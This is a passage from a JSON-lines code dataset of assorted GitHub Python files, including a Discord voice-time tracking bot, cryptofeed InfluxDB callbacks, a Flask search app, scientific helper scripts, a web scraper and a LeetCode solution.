os.path.join(ROOT_DIR, \"tests/images/mcihtest3.tif\"),\n },\n ]\n\n manifest_level_metadata = {\n \"labels\": [\"Test Manifest MCIH\"],\n \"metadata\": [\n {\n \"label\": \"Creator\",\n \"value\": \"Unknown\",\n \"label_lang\": \"en\",\n \"value_lang\": \"en\",\n },\n {\n \"label\": \"Date\",\n \"value\": \"19th Century\",\n \"label_lang\": \"en\",\n \"value_lang\": \"en\",\n },\n ],\n \"required_statement\": [{\"label\": \"Attribution\", \"value\": \"Jinah Kim\"}],\n \"default_lang\": \"en\",\n \"service_type\": \"ImageService2\",\n \"service_profile\": \"level2\",\n \"rights\": \"http://creativecommons.org/licenses/by-sa/3.0/\",\n \"summary\": \"A test 
manifest for Mapping Color in History ingest into MPS IIIF delivery solution\",\n \"providers\": [\n {\n \"labels\": [\n {\n \"lang\": \"en\",\n \"value\": \"Harvard University - Arts and Humanities Research Computing (organizing org)\",\n }\n ],\n \"id\": \"http://id.loc.gov/authorities/names/n78096930\",\n },\n {\n \"labels\": [{\"value\": \"Harvard Art Museum (providing org)\"}],\n \"id\": \"http://id.loc.gov/authorities/names/no2008065752\",\n },\n ],\n }\n\n assets = client.upload(images=images, s3_path=\"images/\")\n\n manifest = client.create_manifest(\n manifest_level_metadata=manifest_level_metadata,\n assets=assets,\n )\n\n result = client.ingest(\n assets=assets,\n manifest=manifest,\n )\n\n status = client.jobstatus(result[\"job_id\"])\n print(\"Done: \", status)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--issuer\", \"-i\", help=\"set issuer\", default=\"atdarth\")\n parser.add_argument(\"--space\", \"-s\", help=\"set space\", default=\"atdarth\")\n parser.add_argument(\"--environment\", \"-e\", help=\"set environment\", default=\"qa\")\n parser.add_argument(\"--asset-prefix\", \"-a\", help=\"set asset prefix\", default=\"\")\n args = parser.parse_args()\n test_ingest_pipeline(args)\n","repo_name":"martimpassos/iiif-ingest-service","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"43350948211","text":"from flask import Flask\nfrom parse import Parser\nfrom vectorizer import Vect\n\napp = Flask(__name__)\nparsewiki = Parser(\"../data/WestburyLab.Wikipedia.Corpus.txt\")\n\nvectorCreator = Vect()\n\"\"\"\nUncomment the next line for:\n- Parse Baseline Benchmark\n- Sequential Search Baseline Benchmark\n\"\"\"\n#parsewiki.parse()\n#parsewiki.vanillaQuery(\"Debargha\")\n\n\"\"\"\nUncommment the next line to build a search index\nIndex will be built in SQLite3 for a full text search\n\"\"\"\n#parsewiki.buildIndex()\n\n@app.route('/query/')\ndef query(querystring):\n \"\"\"\n - Use words in search query that are not stopwords\n - Replace those words with synonyms\n - Replace those words with the Word2Vec embeddings\n - Replace those words with the BERT embeddings\n - Replace those words with the AlBERT embeddings\n - Use the augmented strings to run the search\n \"\"\"\n\n closest = []\n try:\n closest = vectorCreator.closest_three(querystring)\n except:\n print(\"Word not in vocabulary\")\n\n\n return(parsewiki.queryIndex(\"{}\".format(querystring)))\n\n#parsewiki.queryIndex(\"Capitalism is terrible\")\n#parsewiki.queryIndex(\"Heart attack symptoms\")\n#parsewiki.queryTableBM25(\"Capitalism is terrible\")\n#parsewiki.queryTableHighlight(\"Sugar\")\n","repo_name":"DebarghaG/Semoogle","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38981193847","text":"import csv\nimport numpy as np\n\ndef parse_horizon(infile):\n \"\"\"\n Reads a horizon file output from openDetect. 
Contains inline, xline,\n and offsets\n \"\"\"\n \n ils, xls, values = ([],[],[])\n with open(infile, 'r') as f:\n reader=csv.reader(f, delimiter='\\t')\n for il, xl,z, zero, five, ten, ft, twen, tf, t, tf in reader:\n ils.append(int(il)-1)\n xls.append(int(xl)-1)\n point = [float(i) for i in[zero, five, ten, ft, twen, tf, t, tf]]\n values.append(point)\n \n value_array = np.array(values)\n inlines = np.array(ils)\n xlines = np.array(xls)\n horizons = np.zeros((np.amax(inlines)-np.amin(inlines) +1, \n np.amax(xlines) - np.amin(xlines)+1, value_array.shape[1]))\n horizons[inlines-np.amin(inlines), xlines - np.amin(xlines), :] += values\n \n return horizons\n\ndef horizon_norm(horizon):\n \"\"\"\n Normalize a horizon to unit energy across the offset dimension. Filters out\n zero energy and offset curves with NaNs.\n \"\"\"\n \n normed = np.nan_to_num(horizon / np.sqrt(np.sum(horizon**2, 2))[:,:, np.newaxis])\n normed = normed.reshape(normed.shape[0]*normed.shape[1], normed.shape[2])\n \n normed = normed[np.sum(normed,1) > 0]\n \n return normed\n","repo_name":"ben-bougher/admm_opt","sub_path":"horizon_parse.py","file_name":"horizon_parse.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70114448041","text":"# \r\n# Given an array nums and a value val, remove all instances of that value in-place and return the new length.\r\n# \r\n# Do not allocate extra space for another array, you must do this by modifying the input array in-place with O(1) extra memory.\r\n# \r\n# The order of elements can be changed. It doesn't matter what you leave beyond the new length.\r\n# \r\n\r\nfrom typing import List\r\nimport pdb\r\n\r\nsolution_json = {\r\n \"date\": \"2021/3/24\",\r\n \"runtime\": \"36 ms\",\r\n \"memory\": \"14.1 MB\"\r\n}\r\n\r\nclass Solution:\r\n def removeElement(self, nums: List[int], val: int) -> int:\r\n idx = 0\r\n for i in range(len(nums)):\r\n line = ''\r\n line += 'nums[%d] = %d, ' % (i, nums[i])\r\n if nums[i] != val:\r\n nums[idx] = nums[i]\r\n line += 'nums[%d] = %d, ' % (idx, nums[idx])\r\n idx += 1\r\n #print(line)\r\n return idx\r\n","repo_name":"CountChu/LeetCodePython","sub_path":"learn_04_fun_with_arrays/solutions/0027-rm-element-s1.py","file_name":"0027-rm-element-s1.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6306245286","text":"from troposphere import Output, Ref, Template\nfrom troposphere.s3 import Bucket, PublicRead\n\nt = Template(\"Create multiple S3 Bucket for XKE\")\nt.set_version()\n\nfor i in range(1, 10):\n s3_bucket = t.add_resource(Bucket(\"TestBucket\" + str(i),\n BucketName=\"xke-test-bucket-\" + str(i),\n AccessControl=PublicRead))\n t.add_output(Output(\n \"BucketName\" + str(i),\n Value=Ref(s3_bucket),\n Description=\"Name of S3 bucket\"\n ))\n\nprint(t.to_json())\n","repo_name":"fdebuire/cloudformation-troposhere-xke","sub_path":"2-troposphere/S3_multiple_bucket.py","file_name":"S3_multiple_bucket.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37042588954","text":"import os\n\npath = '/home/lowpaw/Downloads/telegram-bibtexbot/notes'\nnotes_list = os.listdir(path)\nnotes_list.sort()\n\ncontents = []\n\nfor note_name in notes_list:\n fo = open(path + '/' + note_name, 'r')\n contents.append(fo.read())\n fo.close()\n\ncontents = 
'\\n\\n'.join(contents)\n\nfo = open('/home/lowpaw/Downloads/telegram-bibtexbot/notes.md', \"w\")\nfo.write(contents)\nfo.close()\n\n# html is generated with:\n# https://www.makeuseof.com/md-block-render-markdown-web-page/\n\nnotes_html = ['''\n\n\n\n\n\n\n\n\n''','''\n\n\n\n\n\n'''\n]\n\nfo = open('/home/lowpaw/Downloads/telegram-bibtexbot/notes.html', \"w\")\nfo.write(contents.join(notes_html))\nfo.close()\n","repo_name":"lapamatoz/telegram-bibtexbot","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3637200461","text":"#!python3\n\nimport asyncio\nimport datetime\nimport discord\nimport json\nfrom sqlalchemy import Column, DateTime, Interval, Boolean, String\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm.exc import NoResultFound\nimport sys\n\n# Database setup\nBase = declarative_base()\n\nclass Member(Base):\n __tablename__ = 'members'\n id = Column(String, primary_key=True)\n name = Column(String)\n last_join = Column(DateTime)\n total_time = Column(Interval)\n in_chat = Column(Boolean)\n\n def update_total_time(self):\n \"\"\"Update total_time with time since last_join\"\"\"\n now = datetime.datetime.now()\n self.total_time += now - self.last_join\n self.last_join = now\n\nengine = create_engine('sqlite:///member_tracker.sqlite')\nsession = sessionmaker()\nsession.configure(bind=engine)\nBase.metadata.create_all(engine)\n\n# Discord client\nclient = discord.Client()\n\n# Helpers\ndef update_active_users():\n \"\"\"Updates total_time for all active users\"\"\"\n s = session()\n for channel in client.get_all_channels():\n for member in channel.voice_members:\n if not member.voice.is_afk:\n try:\n dbmember = s.query(Member).filter(\n Member.id == member.id\n ).one()\n dbmember.in_chat = True\n dbmember.update_total_time()\n except NoResultFound:\n dbmember = Member(\n id=member.id,\n name=member.nick if member.nick else member.name,\n last_join=datetime.datetime.now(),\n total_time=datetime.timedelta(0),\n in_chat=True\n )\n s.add(dbmember)\n s.commit()\n\ndef check_admin(message):\n \"\"\"Checks if the message is from an administrator\"\"\"\n perms = message.channel.permissions_for(message.author)\n is_admin = perms.administrator\n try:\n for role in message.author.roles:\n if \"Admins\" in role.name or \"Founder\" in role.name:\n is_admin = True\n break\n except AttributeError:\n # Bypass for redkrieg to work in private messages\n if str(message.author.id) == \"135195179219943424\":\n is_admin = True\n return is_admin\n\ndef format_timedelta(td):\n \"\"\"Formats timedelta without microseconds\"\"\"\n # Modified from stdlib datetime.timedelta.__str__\n mm, ss = divmod(td.seconds, 60)\n hh, mm = divmod(mm, 60)\n s = \"%d:%02d:%02d\" % (hh, mm, ss)\n if td.days:\n def plural(n):\n return n, abs(n) != 1 and \"s\" or \"\"\n s = (\"%d day%s, \" % plural(td.days)) + s\n return s\n\n\n# Background events\nasync def active_user_update_loop():\n \"\"\"Reset join times, wait for discord connection, then keep db synced\"\"\"\n s = session()\n members = s.query(Member).all()\n now = datetime.datetime.now()\n for member in members:\n member.in_chat = False\n member.last_join = now\n s.commit()\n await client.wait_until_ready()\n while not client.is_closed:\n update_active_users()\n await asyncio.sleep(60)\n\n# Discord events\n@client.event\nasync def 
on_voice_state_update(before, after):\n \"\"\"Monitor status updates for voice channels\"\"\"\n s = session()\n # prefer nickname in server to actual discord username\n member_name = before.nick if before.nick else before.name\n try:\n member = s.query(Member).filter(Member.id == before.id).one()\n # update member names on each channel join\n member.name = member_name\n except NoResultFound:\n member = Member(\n id=before.id,\n name=member_name,\n last_join=datetime.datetime.now(),\n total_time=datetime.timedelta(0),\n in_chat=False\n )\n s.add(member)\n if after.voice.voice_channel is None:\n if member.in_chat:\n member.in_chat = False\n member.update_total_time()\n try:\n channel_name = before.voice.voice_channel.name\n except AttributeError:\n channel_name = \"Unknown\"\n print(\"{} left voice channel {}. Total time: {}\".format(\n member.name,\n channel_name,\n member.total_time\n ))\n else:\n if member.in_chat:\n # Don't consider deafened or afk users as active\n if after.voice.is_afk or after.voice.self_deaf or after.voice.deaf:\n # This logic breaks if the user is server deafened and\n # self-deafens as well. Need to think through.\n member.in_chat = False\n member.update_total_time()\n else:\n member.in_chat = True\n member.last_join = datetime.datetime.now()\n try:\n channel_name = after.voice.voice_channel.name\n except AttributeError:\n channel_name = \"Private\"\n print(\"{} joined voice channel {}. Total time: {}\".format(\n member.name,\n channel_name,\n member.total_time\n ))\n s.commit()\n sys.stdout.flush()\n\n@client.event\nasync def on_message(message):\n \"\"\"Handles incoming messages\"\"\"\n if message.author == client.user:\n return\n\n if not check_admin(message):\n return\n\n if message.content.startswith('!velocistats'):\n s = session()\n if len(message.mentions) > 0:\n for member in message.mentions:\n try:\n dbmember = s.query(Member).filter(\n Member.id == member.id\n ).one()\n except NoResultFound:\n await client.send_message(\n message.channel,\n \"User {} not found!\".format(\n member.nick if member.nick else member.name\n )\n )\n continue\n if dbmember.in_chat:\n dbmember.update_total_time()\n s.commit()\n await client.send_message(\n message.channel,\n \"User {0} has a total chat time of {1}\".format(\n dbmember.name,\n format_timedelta(dbmember.total_time)\n )\n )\n elif message.content.startswith('!velocistats low'):\n members = s.query(Member).order_by(\n Member.total_time.asc()\n ).filter(\n Member.name.startswith('-=[ V ]=-')\n ).limit(10).all()\n msg = [ \"\"\"Current Lowest Voice Users\\n\\n```\"\"\" ]\n for member in members:\n if member.in_chat:\n member.update_total_time()\n msg.append(\n \"{0: <40}{1: >25}\\n\".format(\n member.name,\n format_timedelta(member.total_time)\n )\n )\n msg.append(\"\"\"```\"\"\")\n s.commit()\n await client.send_message(\n message.channel,\n ''.join(msg)\n )\n else:\n members = s.query(Member).order_by(\n Member.total_time.desc()\n ).limit(10).all()\n msg = [ \"\"\"Current Top Voice Users\\n\\n```\"\"\" ]\n for member in members:\n if member.in_chat:\n member.update_total_time()\n msg.append(\n \"{0: <40}{1: >25}\\n\".format(\n member.name,\n format_timedelta(member.total_time)\n )\n )\n msg.append(\"\"\"```\"\"\")\n s.commit()\n await client.send_message(\n message.channel,\n ''.join(msg)\n )\n\n@client.event\nasync def on_ready():\n \"\"\"Print out some status info on connect\"\"\"\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n sys.stdout.flush()\n\n# 
Configuration\nwith open('token.json') as f:\n    token = json.load(f)['token']\n    \n# Run it\nclient.loop.create_task(active_user_update_loop())\nclient.run(token)\n","repo_name":"RedKrieg/velocibot","sub_path":"velocibot.py","file_name":"velocibot.py","file_ext":"py","file_size_in_byte":8339,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"20306377355","text":"\ndef move_x(location_x):\n \n \n # center x pixel\n center_x = 424\n\n # find difference between center and object, positive number means to the right\n diff_x = location_x - center_x\n\n #if object is to the right\n if (diff_x > 300):\n return 1\n\n elif (diff_x > 200):\n return 2\n\n elif (diff_x > 100):\n return 3\n\n elif (diff_x > 10):\n return 4\n\n #if object is to the left \n elif (diff_x < -300):\n return -1\n \n elif (diff_x < -200):\n return -2\n \n elif (diff_x < -100):\n return -3\n \n elif (diff_x < -10):\n return -4\n\n #if object is near the center, do nothing: return the sentinel 200\n else:\n return 200\n\n# find direction to turn motor\ndef find_direction(data):\n direction = 0\n if (data > 0):\n direction = 0\n else:\n direction = 1\n direction = \"setDirection:\" + str(direction)\n return direction\n \n# calculate angle to send to motors\ndef calc_angle(data):\n angle = 0\n diff = abs(data)\n\n if diff == 1:\n angle = 30\n elif diff == 2:\n angle = 20\n elif diff == 3:\n angle = 10\n elif diff == 4:\n angle = 3\n else:\n angle = 0\n\n angle = \"moveMotor:\" + str(angle)\n return angle\n\n\n\n\n\ndef move_y(location_y):\n \n # center y pixel\n center_y = 240\n\n # find difference between center and object, positive number means below\n diff_y = location_y - center_y\n\n #if object is below\n if (diff_y > -200):\n return 1\n\n elif (diff_y > -100):\n return 2\n\n #if object is above \n elif (diff_y < 200):\n return -1\n \n elif (diff_y < 100):\n return -2\n\n #if object is near the center, do nothing: return the sentinel 200\n else:\n return 200","repo_name":"ClaytonWilson12/nerf","sub_path":"scripts/servo_instruction.py","file_name":"servo_instruction.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40636754268","text":"# Emoji library\nfrom emoji import emojize\n# Import settings.py to keep tokens, passwords and personal data out of the code\nimport settings\n# The random module handles random numbers: randint for integers, choice for picking a random element\nfrom random import randint, choice\n# Classes for building keyboards\nfrom telegram import ReplyKeyboardMarkup, KeyboardButton\n\n\n# Function for getting an emoji\ndef get_smile(user_data):\n    if 'emoji' not in user_data:\n        smile = choice(settings.USER_EMOJI)\n        return emojize(smile, language='alias')# convert smile (text) into an emoji icon; language='alias' means textual emoji aliases\n    return user_data['emoji']\n\n\n# Function that reports the result of the numbers game\ndef play_random_numbers(user_number):\n    bot_number = randint(user_number - 10, user_number + 10)\n    if user_number > bot_number:\n        message = f'Твое число {user_number}, мое {bot_number}, ты выиграл'\n    elif user_number == bot_number:\n        message = f'Твое число {user_number}, мое {bot_number}, ничья'\n    else:\n        message = f'Твое число {user_number}, мое {bot_number}, ты проиграл'\n    return message\n\n\n# Function that builds the main keyboard: a 'Прислать котика' (send a cat picture) button and a geolocation button (location works from mobile)\ndef 
main_keyboard():\n return ReplyKeyboardMarkup([\n ['Прислать котика', KeyboardButton('Мои координаты', request_location=True)]\n ])\n","repo_name":"Comandosss/mybot","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73417863080","text":"import requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nimport lxml.etree\nimport time\nimport random\n#urls = \"https://www.meituri.com/s/%d/\"%index\n\ndef getTree(url):\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\"Host\": \"www.meituri.com\"}\n try:\n r=requests.get(url, timeout=5,headers = headers, verify = False)\n r.raise_for_status()\n r.encoding=r.apparent_encoding\n tree=lxml.etree.HTML(r.text)\n return tree\n except Exception as e:\n raise Exception(\"404\",e)\n return None\nindex = 1\nwhile True:\n urlx = \"https://www.meituri.com/x/%d/\"%index\n try:\n tree=getTree(urlx)\n content=tree.xpath(\"//div[@class='fenlei']\")[0]\n title=content.xpath(\"h1\")[0].xpath(\"string(.)\")\n detail=content.xpath(\"p\")[0].xpath(\"string(.)\")\n detail=detail.replace(\"\\n\",\" \")\n print(index,urlx,title,detail,sep=\"@\",end=\"\\n\")\n except Exception as e:\n print(e)\n break\n index+=1\n time.sleep(random.randint(1,3))\n\nprint(\"++++++++++++++\")\nindex = 9\nwhile True:\n urls = \"https://www.meituri.com/s/%d/\"%index\n try:\n tree=getTree(urls)\n content=tree.xpath(\"//div[@class='fenlei']\")[0]\n title=content.xpath(\"h1\")[0].xpath(\"string(.)\")\n detail=content.xpath(\"p\")[0].xpath(\"string(.)\")\n print(index,urls,title,detail,sep=\"@\",end=\"\\n\")\n except Exception as e:\n print(e)\n break\n index+=1\n time.sleep(random.randint(2,4))\n\n\"\"\"\nurl = \"https://www.meituri.com/x/1/\"\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\"Host\": \"www.meituri.com\"}\nr=requests.get(url, timeout=5,headers = headers, verify = False)\nprint(r.status_code)\nprint(len(r.text))\"\"\"","repo_name":"crj1998/meitu","sub_path":"meituAPI.py","file_name":"meituAPI.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38014986121","text":"from ase.build import mx2\nfrom ase import Atoms\nfrom ase.io import read, write\nfrom ase.calculators.espresso import Espresso\nimport math\n\ndef monolayer_MX2(formula, a, thickness,vacuum):\n crystal=mx2(formula=formula, kind='2H', a=a, thickness=thickness, size=(1,1,1), vacuum=None)\n #print(crystal.positions)\n #convert to all PBC cell\n slab=Atoms(crystal)\n slab.set_cell([crystal.cell[0],crystal.cell[1],[0.0,0.0,vacuum]], scale_atoms=False)\n slab.set_pbc([True, True, True])\n return slab\n\ndef monolayer_Xene(formula, a, buckling, vacuum):\n if vacuum is not None:\n buckling=buckling/vacuum\n\n positions=[[2/3, 1/3,buckling/2.0],[1/3,2/3,-buckling/2.0]]\n cell=[[a, 0, 0], [-a/2, a * 3**0.5 / 2, 0], [0, 0, 0]]\n atoms = Atoms(formula, positions=positions, cell=cell, pbc=(1, 1, 0))\n atoms.set_scaled_positions(positions)\n if vacuum is not None:\n atoms.center(vacuum, axis=2)\n return 
atoms\n\n\n\n\n","repo_name":"eminamitani/layeredMaterialToolKit","sub_path":"layeredMaterialToolKit/monolayer.py","file_name":"monolayer.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11669658912","text":"from decimal import Decimal\nimport logging\nimport requests\n\nfrom cryptofeed.defines import BID, ASK\nfrom cryptofeed.backends._util import book_convert, book_delta_convert\nfrom cryptofeed.backends.http import HTTPCallback\nfrom cryptofeed.exceptions import UnsupportedType\n\n\nLOG = logging.getLogger('feedhandler')\n\n\nclass InfluxCallback(HTTPCallback):\n def __init__(self, addr: str, db: str, create_db=True, numeric_type=str, **kwargs):\n \"\"\"\n Parent class for InfluxDB callbacks\n\n influxDB schema\n ---------------\n MEASUREMENT | TAGS | FIELDS\n\n Measurement: Data Feed-Exxhange (configurable)\n TAGS: pair\n FIELDS: timestamp, amount, price, other funding specific fields\n\n Example data in InfluxDB\n ------------------------\n > select * from COINBASE-book;\n name: COINBASE\n time amount pair price side timestamp\n ---- ------ ---- ----- ---- ---------\n 1542577584985404000 0.0018 BTC-USD 5536.17 bid 2018-11-18T21:46:24.963762Z\n 1542577584985404000 0.0015 BTC-USD 5542 ask 2018-11-18T21:46:24.963762Z\n 1542577585259616000 0.0018 BTC-USD 5536.17 bid 2018-11-18T21:46:25.256391Z\n\n Parameters\n ----------\n addr: str\n Address for connection. Should be in the format:\n http(s)://:port\n db: str\n Database to write to\n numeric_type: str/float\n Convert types before writing (amount and price)\n \"\"\"\n super().__init__(addr, **kwargs)\n self.addr = f\"{addr}/write?db={db}\"\n self.session = None\n self.numeric_type = numeric_type\n\n if create_db:\n r = requests.post(f'{addr}/query', data={'q': f'CREATE DATABASE {db}'})\n r.raise_for_status()\n\nclass TradeInflux(InfluxCallback):\n def __init__(self, *args, key='trades', **kwargs):\n super().__init__(*args, **kwargs)\n self.key = key\n\n async def __call__(self, *, feed: str, pair: str, side: str, amount: Decimal, price: Decimal, order_id=None, timestamp=None):\n amount = str(amount)\n price = str(price)\n\n if order_id is None:\n order_id = 'None'\n if self.numeric_type is str:\n trade = f'{self.key}-{feed},pair={pair} side=\"{side}\",id=\"{order_id}\",amount=\"{amount}\",price=\"{price}\",timestamp={timestamp}'\n elif self.numeric_type is float:\n trade = f'{self.key}-{feed},pair={pair} side=\"{side}\",id=\"{order_id}\",amount={amount},price={price},timestamp={timestamp}'\n else:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n\n await self.write('POST', trade)\n\n\nclass FundingInflux(InfluxCallback):\n def __init__(self, *args, key='funding', **kwargs):\n super().__init__(*args, **kwargs)\n self.key = key\n\n async def __call__(self, *, feed, pair, **kwargs):\n data = f\"{self.key}-{feed},pair={pair} \"\n\n for key, val in kwargs.items():\n if key in {'feed', 'pair'}:\n continue\n if isinstance(val, (Decimal, float)):\n val = str(val)\n if self.numeric_type is str:\n val = f'\"{val}\"'\n elif self.numeric_type is not float:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n elif isinstance(val, str):\n val = f'\"{val}\"'\n data += f\"{key}={val},\"\n\n data = data[:-1]\n await self.write('POST', data)\n\n\nclass InfluxBookCallback(InfluxCallback):\n async def _write_rows(self, start, data, timestamp):\n msg = []\n ts = int(timestamp * 1000000000)\n for side in (BID, ASK):\n 
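# Each (price, amount) level below becomes one InfluxDB line-protocol point;\n            # ts is advanced by 1 ns per point so InfluxDB does not collapse points\n            # that share the same measurement, tag set, and timestamp.\n            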
for price, val in data[side].items():\n if isinstance(val, dict):\n for order_id, amount in val.items():\n if self.numeric_type is str:\n msg.append(f'{start} side=\"{side}\",id=\"{order_id}\",timestamp={timestamp},price=\"{price}\",amount=\"{amount}\" {ts}')\n elif self.numeric_type is float:\n msg.append(f'{start} side=\"{side}\",id=\"{order_id}\",timestamp={timestamp},price={price},amount={amount} {ts}')\n else:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n ts += 1\n else:\n if self.numeric_type is str:\n msg.append(f'{start} side=\"{side}\",timestamp={timestamp},price=\"{price}\",amount=\"{val}\" {ts}')\n elif self.numeric_type is float:\n msg.append(f'{start} side=\"{side}\",timestamp={timestamp},price={price},amount={val} {ts}')\n else:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n ts += 1\n await self.write('POST', '\\n'.join(msg))\n\n\nclass BookInflux(InfluxBookCallback):\n def __init__(self, *args, key='book', depth=None, **kwargs):\n super().__init__(*args, **kwargs)\n self.depth = depth\n self.key = key\n self.previous = {BID: {}, ASK: {}}\n\n async def __call__(self, *, feed, pair, book, timestamp):\n data = {BID: {}, ASK: {}}\n book_convert(book, data, self.depth)\n\n if self.depth:\n if data[BID] == self.previous[BID] and data[ASK] == self.previous[ASK]:\n return\n self.previous[ASK] = data[ASK]\n self.previous[BID] = data[BID]\n\n start = f\"{self.key}-{feed},pair={pair},delta=False\"\n await self._write_rows(start, data, timestamp)\n\n\nclass BookDeltaInflux(InfluxBookCallback):\n def __init__(self, *args, key='book', **kwargs):\n super().__init__(*args, **kwargs)\n self.key = key\n\n async def __call__(self, *, feed, pair, delta, timestamp):\n start = f\"{self.key}-{feed},pair={pair},delta=True\"\n data = {BID: {}, ASK: {}}\n book_delta_convert(delta, data)\n await self._write_rows(start, data, timestamp)\n","repo_name":"glgnohk/cryptofeed","sub_path":"cryptofeed/backends/influxdb.py","file_name":"influxdb.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"24335313925","text":"from __future__ import print_function\r\nimport argparse\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torchvision import datasets, transforms\r\nfrom torch.autograd import Variable\r\nimport os\r\nimport numpy as np\r\nfrom dann_model import DANN_Neural_Network\r\nfrom dann_data import MNIST, SVHN\r\n\r\n\r\n# Training settings\r\nparser = argparse.ArgumentParser(description='PyTorch MNIST Example')\r\nparser.add_argument('--batch-size', type=int, default=64, metavar='N',\r\n help='input batch size for training (default: 64)')\r\nparser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\r\n help='input batch size for testing (default: 1000)')\r\nparser.add_argument('--epochs', type=int, default=10, metavar='N',\r\n help='number of epochs to train (default: 10)')\r\nparser.add_argument('--lr', type=float, default=0.01, metavar='LR',\r\n help='learning rate (default: 0.01)')\r\nparser.add_argument('--momentum', type=float, default=0.5, metavar='M',\r\n help='SGD momentum (default: 0.5)')\r\nparser.add_argument('--no-cuda', action='store_true', default=False,\r\n help='disables CUDA training')\r\nparser.add_argument('--seed', type=int, default=1, metavar='S',\r\n help='random seed (default: 1)')\r\nparser.add_argument('--log-interval', type=int, default=10, metavar='N',\r\n help='how many batches to 
wait before logging training status')\r\nparser.add_argument('--save_dir', type=str, default='./train',\r\n help=\"the path to save the trained model\")\r\nargs = parser.parse_args()\r\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\r\n\r\nif not os.path.exists(args.save_dir):\r\n os.makedirs(args.save_dir)\r\n\r\ntorch.manual_seed(args.seed)\r\nif args.cuda:\r\n torch.cuda.manual_seed(args.seed)\r\n\r\nbatch_size = 128\r\n\r\n\r\n\r\ntest_dataset = SVHN(csv_file=\"./hw3_data/digits/svhn/test.csv\", root_dir=\"./hw3_data/digits/svhn/test\",transform=transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\r\n ]))\r\n\r\n\r\n\r\ntrain_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=True)\r\n\r\n\r\n\r\n\r\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\r\n\r\nmodel = DANN_Neural_Network()\r\n\r\nmodel_root = os.path.join('.','dann_NN_models/mnist_to_svhn')\r\n\r\nNN_test = torch.load(os.path.join(\r\n model_root, 'domainadaptation2_model28-0' + '.pth'\r\n ))\r\ncst = 0\r\nif args.cuda:\r\n model.cuda()\r\n\r\ndef generate_feature():\r\n model.eval()\r\n cnt = 0\r\n out_target = []\r\n out_data = []\r\n out_output =[]\r\n for data, target in train_loader:\r\n cnt += len(data)\r\n print(\"processing: %d/%d\" % (cnt, len(train_loader.dataset)))\r\n if args.cuda:\r\n data, target = data.cuda(), target.cuda()\r\n data, target = Variable(data, volatile=True), Variable(target)\r\n output = model(data)\r\n output_np = output.data.cpu().numpy()\r\n target_np = target.data.cpu().numpy()\r\n data_np = data.data.cpu().numpy()\r\n\r\n out_output.append(output_np)\r\n out_target.append(target_np[:, np.newaxis])\r\n out_data.append(np.squeeze(data_np))\r\n\r\n\r\n output_array = np.concatenate(out_output, axis=0)\r\n target_array = np.concatenate(out_target, axis=0)\r\n data_array = np.concatenate(out_data, axis=0)\r\n\r\n np.save(os.path.join(\"./tsne\", 'output.npy'), output_array, allow_pickle=False)\r\n np.save(os.path.join(\"./tsne\", 'target.npy'), target_array, allow_pickle=False)\r\n np.save(os.path.join(\"./tsne\", 'data.npy'), data_array, allow_pickle=False)\r\n\r\ngenerate_feature()","repo_name":"amelieclautour/DLCV2019-Hw3-GAN","sub_path":"tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30658834279","text":"n = int(input())\nd = dict()\nl = []\n\nfor i in range(n-1):\n m = 